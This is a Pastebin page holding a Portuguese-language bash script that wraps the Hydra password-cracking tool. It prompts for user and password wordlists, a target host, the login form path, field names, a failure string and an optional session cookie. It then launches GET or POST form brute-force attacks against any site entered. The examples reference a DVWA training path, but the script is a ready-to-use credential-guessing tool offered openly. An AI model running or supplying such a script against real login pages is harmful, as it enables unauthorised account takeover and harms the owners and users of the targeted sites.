SHARE
TWEET

Hydra [http brute force]

DarkProgrammer000 Oct 9th, 2019 166 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2.  
  3. ---------------------
  4. * DarkProgrammer000 *
  5. ---------------------
  6.  
  7. #################
  8. #### FUNCAO #####
  9. #################
  10.  
  11. informacao_GET()
  12. {
  13.     echo -e "\033[01;31m ---------------- EXEMPLO --------------- \033[00;37m"
  14.     echo -e "\033[01;32m - Wordlist [usuarios]: user              \033[00;37m"
  15.     echo -e "\033[01;33m - Wordlist [senhas]: pass                \033[00;37m"
  16.     echo -e "\033[01;34m - Host: www.exemplo.com                  \033[00;37m"
  17.     echo -e "\033[01;35m - Validacao: /dvwa/vulnerabilities/brute \033[00;37m"
  18.     echo -e "\033[01;36m - Campo [nome]: username                 \033[00;37m"
  19.     echo -e "\033[01;37m - Campo [senha]: password                \033[00;37m"
  20.     echo -e "\033[01;31m - Saida de erro: 'senha invalida'        \033[00;37m"
  21.     echo -e "\033[01;32m - Erro: 'senha invalida'                 \033[00;37m"
  22.     echo -e "\033[01;33m - Submit [url]: Login                    \033[00;37m"
  23.     echo -e "\033[01;30m ---------------------------------------- \033[00;37m"
  24. }
  25.  
  26. informacao_POST()
  27. {
  28.     echo -e "\033[01;31m -------------- EXEMPLO --------------- \033[00;37m"
  29.     echo -e "\033[01;32m Wordlist [usuarios]: user              \033[00;37m"
  30.     echo -e "\033[01;33m Wordlist [senhas]: pass                \033[00;37m"
  31.     echo -e "\033[01;34m Host: www.exemplo.com                  \033[00;37m"
  32.     echo -e "\033[01;35m Validacao: /dvwa/vulnerabilities/brute \033[00;37m"
  33.     echo -e "\033[01;36m Campo [nome]: username                 \033[00;37m"
  34.     echo -e "\033[01;37m Campo [senha]: password                \033[00;37m"
  35.     echo -e "\033[01;31m Saida de erro: 'senha invalida'        \033[00;37m"
  36.     echo -e "\033[01;32m Erro: 'senha invalida'                 \033[00;37m"
  37.     echo -e "\033[01;30m -------------------------------------- \033[00;37m"
  38. }
  39.  
  40. Formulario_Web_Padrao()
  41. {
  42.     echo ""
  43.     echo -e -n "\033[01;32m + Wordlist (usuarios): \033[00;37m"
  44.     read usuarios
  45.  
  46.     echo ""
  47.     echo -e -n "\033[01;33m + Wordlist (senhas): \033[00;37m"
  48.     read senhas
  49.  
  50.     echo ""
  51.     echo -e -n "\033[01;34m + Host (Ex: www.site.com): \033[00;37m"
  52.     read site
  53.  
  54.     echo ""
  55.     echo -e -n "\033[01;35m + Validacao (Ex: /admin/validar.php): \033[00;37m"
  56.     read validacao
  57.  
  58.     echo ""
  59.     echo -e -n "\033[01;31m + Campo login (Ex: usuario): \033[00;37m"
  60.     read user
  61.  
  62.     echo ""
  63.     echo -e -n "\033[01;32m + Campo senha (Ex: senha): \033[00;37m"
  64.     read pass
  65.  
  66.     echo ""
  67.     echo -e -n "\033[01;33m + Saida de erro (Ex: invalido): \033[00;37m"
  68.     read erro
  69.     echo ""
  70. }
  71.  
  72. Cookie_POST()
  73. {
  74.     echo ""
  75.     echo -e "\033[01;31m Informar Cookie: \033[00;37m"
  76.     echo -e "\033[01;32m [1] Sim \033[00;37m"
  77.     echo -e "\033[01;33m [2] Nao \033[00;37m"
  78.     echo ""
  79.     echo -e -n "\033[01;34m + Opc: \033[00;37m"
  80.     read resp
  81.  
  82.     # Estrutura em escolha    
  83.     case $resp in
  84.     1)
  85.         echo -e -n "\033[01;35m Cookie (Ex: Cookie: security=low; PHPSESSID=eh3utmffq3fuu0psbc1p24aah7): \033[00;37m"
  86.         read cookie
  87.            
  88.         # Hydra (com cookie)
  89.         hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro:H=$cookie" -V -t4
  90.         ;;    
  91.    
  92.     2)
  93.         # Hydra (sem cookie)
  94.         hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro" -V -t4
  95.         ;;
  96.    
  97.     *)
  98.         ;;
  99.  
  100.     esac
  101. }
  102.  
  103. Cookie_GET()
  104. {
  105.     echo -e -n "\033[01;31m Login (Ex: Analisar URL (...&Login=Login): \033[00;37m"
  106.     read login
  107.  
  108.     echo ""
  109.     echo -e "\033[01;31m Informar Cookie: \033[00;37m"
  110.     echo -e "\033[01;32m [1] Sim \033[00;37m"
  111.     echo -e "\033[01;33m [2] Nao \033[00;37m"
  112.     echo ""
  113.     echo -e -n "\033[01;34m + Opc: \033[00;37m"
  114.     read resp
  115.    
  116.     # Estrutura em escolha    
  117.     case $resp in
  118.     1)
  119.         echo -e -n "\033[01;35m Cookie: (Ex: Cookie: security=low; PHPSESSID=eh3utmffq3fuu0psbc1p24aah7): \033[00;37m"
  120.         read cookie
  121.        
  122.         # Hydra (com cookie)
  123.         hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^&$login=$login:F=$erro:H=$cookie" -V -t4;;
  124.    
  125.     2)
  126.         # Hydra (sem cookie)
  127.         hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^$login=$login:F=$erro" -V -t4;;
  128.    
  129.     esac
  130. }
  131.  
  132. ####################
  133. ##### PROGRAMA #####
  134. ####################
  135. clear
  136. echo -e "\033[01;33m ------------- \033[00;37m"
  137. echo -e "\033[01;33m     Hydra     \033[00;37m"
  138. echo -e "\033[01;33m ------------- \033[00;37m"
  139. echo ""
  140. echo -e "\033[01;32m [1] GET  \033[00;37m"
  141. echo -e "\033[01;34m [2] POST \033[00;37m"
  142. echo ""
  143. echo -e -n "\033[01;35m + Opc: \033[00;37m"
  144. read escolha
  145. echo ""
  146.  
  147. # Estrutura em escolha
  148. case $escolha in
  149.    
  150. 1)
  151.     # Metodo GET
  152.     metodo="http-get-form"
  153.  
  154.     # Chamada de funcao
  155.     informacao_GET
  156.     Formulario_Web_Padrao
  157.     Cookie_GET
  158.     ;;
  159.  
  160. 2)
  161.     # Metodo POST
  162.     metodo="http-post-form"
  163.  
  164.     # Chamada de funcao
  165.     informacao_POST
  166.     Formulario_Web_Padrao
  167.     Cookie_POST
  168.     ;;
  169.        
  170. *)
  171.     ;;
  172. esac
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top